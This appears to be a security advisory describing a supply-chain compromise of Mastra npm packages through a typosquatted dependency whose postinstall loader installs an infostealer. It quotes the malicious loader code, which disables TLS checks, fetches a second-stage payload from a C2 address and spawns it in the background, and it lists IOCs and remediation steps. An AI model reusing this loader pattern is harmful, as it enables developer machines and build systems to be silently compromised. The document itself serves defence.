Supply Chain Alert: 140 Mastra npm Packages Compromised via Typosquatted Dependency
A sophisticated software supply chain attack has recently targeted the JavaScript ecosystem, compromising over 140 npm packages within the popular Mastra namespace. This breach exposes developers, CI/CD pipelines, and enterprise-grade production environments to a stealthy, cross-platform infostealer designed to bypass traditional security scrutiny.
The campaign, uncovered by the Socket Research Team, utilized a highly effective dependency injection strategy. Rather than tampering with the original source code of the @mastra/* packages—which would have likely been flagged during manual audits—the attackers introduced a typosquatted dependency named easy-day-js. By injecting this malicious package into the existing dependency trees, the attackers significantly expanded the “blast radius,” leveraging Mastra’s massive footprint in modern web development workflows.
Technical analysis reveals that the threat actor, operating under the npm handle “ehindero,” published 141 malicious versions in a concentrated burst. The primary vector of infection was easy-day-js version 1.11.22, which weaponized a postinstall script. This ensures that the malicious payload executes automatically the moment a developer or an automated build agent runs npm install, requiring zero user interaction to achieve initial execution.
Technical Breakdown: The Infection Lifecycle
The compromise follows a multi-stage execution flow designed to maximize stealth and evade forensic discovery:
- Stage 1: The Loader (setup.cjs): Upon installation, a loader script executes. To facilitate unencrypted communication with the attacker’s infrastructure, the script explicitly disables TLS certificate validation by setting
NODE_TLS_REJECT_UNAUTHORIZEDto'0'. It then fetches a second-stage payload from a remote C2 server and spawns it as a detached background process, immediately deleting itself to leave minimal traces on the file system.
// Snippet of the malicious loader logic
process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';
const url="https://23.254.164.92:8000/update/49890878";
const stage2 = await (await fetch(url)).text();
child_process.spawn(process.execPath, [out, '23.254.164.123:443'], {
detached: true, stdio: 'ignore'
}).unref();- Stage 2: The Implant (protocal.cjs): The second-stage payload is a persistent Node.js-based implant. This module establishes a Command-and-Control (C2) link, allowing the attacker to execute arbitrary system commands remotely.
- Persistence: To ensure survival across reboots, the malware utilizes platform-specific hooks: Windows Registry Run keys, macOS LaunchAgents, and Linux systemd services.
- Data Exfiltration & Reconnaissance: Once established, the malware performs host reconnaissance, targeting browser histories (Chrome, Edge, Brave) and scanning for cryptocurrency wallet extensions. The current sample identifies over 160 different wallet types, including MetaMask, Phantom, and Coinbase Wallet.
While the current iteration focuses on inventorying sensitive assets, its modular architecture suggests the capability to deploy more destructive payloads for direct credential theft or lateral movement within a network.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| C2 IP Address | 23.254.164[.]92 |
| C2 IP Address | 23.254.164[.]123 |
| Malicious URL | https://23.254.164[.]92:8000/update/49890878 |
| Malicious File | protocal.cjs |
| Persistence (Windows) | NvmProtocal (Run Key) |
| Persistence (macOS) | com.nvm.protocal (LaunchAgent) |
| Persistence (Linux) | nvmconf.service |
| SHA256 Hash | b122a9873bedf145ae2a7fd024b5f309007dbb025149f4dc4ac3f7e4f32a36a4 |
Mitigation and Defensive Posture
The implications of this attack are severe because it targets the automated nature of modern DevOps. Even “passive” environments like GitHub Actions, GitLab CI, or Jenkins runners are susceptible to infection during the build phase. Given that packages like @mastra/core see over 918,000 weekly downloads, the scale of potential exposure is immense.
Immediate Remediation Steps:
- Isolate Affected Systems: Treat any machine or build agent that has run
npm installon the affected packages as fully compromised. - Sanitize Environments: Delete
node_modules, clear local npm caches, and perform a clean reinstall of known-good dependency versions. - Eradicate Persistence: Manually inspect and remove the registry keys, LaunchAgents, or systemd services listed in the IOCs above.
- Credential Rotation: Assume all secrets present on the compromised machine are lost. Rotate npm tokens, AWS/Cloud keys, SSH keys, and environment variables immediately.
Long-term Strategic Defense:
- Restrict Installation Scripts: Use
npm install --ignore-scriptsto prevent the execution of arbitrarypostinstallcode. - Dependency Pinning & Auditing: Implement strict version locking (via
package-lock.json) and utilize tools that perform behavioral analysis of dependencies. - Network Egress Filtering: Monitor and restrict outbound network connections from CI/CD runners to prevent unauthorized C2 communication.
This incident serves as a stark reminder that the security of the software supply chain is only as strong as its most obscure transitive dependency. Traditional code auditing is no longer sufficient; runtime behavioral monitoring is now a necessity.